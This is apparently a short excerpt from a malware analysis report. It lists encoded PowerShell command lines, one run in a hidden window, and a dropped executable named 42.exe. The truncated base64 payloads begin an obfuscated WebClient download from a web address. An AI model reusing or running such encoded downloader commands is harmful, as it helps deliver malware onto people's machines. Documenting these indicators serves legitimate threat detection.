Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHADAAXwA4AF8AMwA9ACgAJwBsAF8ANQAnACsAJwBfADcANwA2ACcAKQA7ACQAUAAwAF8ANgA1ADAAXwA5AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEQAXwA3ADMAMQA1AD0AKAAnAGgAdAB0AH...
- %HOMEPATH%\42.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHADAAXwA4AF8AMwA9ACgAJwBsAF8ANQAnACsAJwBfADcANwA2ACcAKQA7ACQAUAAwAF8ANgA1ADAAXwA5AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEQAXwA3ADMAMQA1AD0AKAAnAGgAdAB0AH...' (with a hidden window)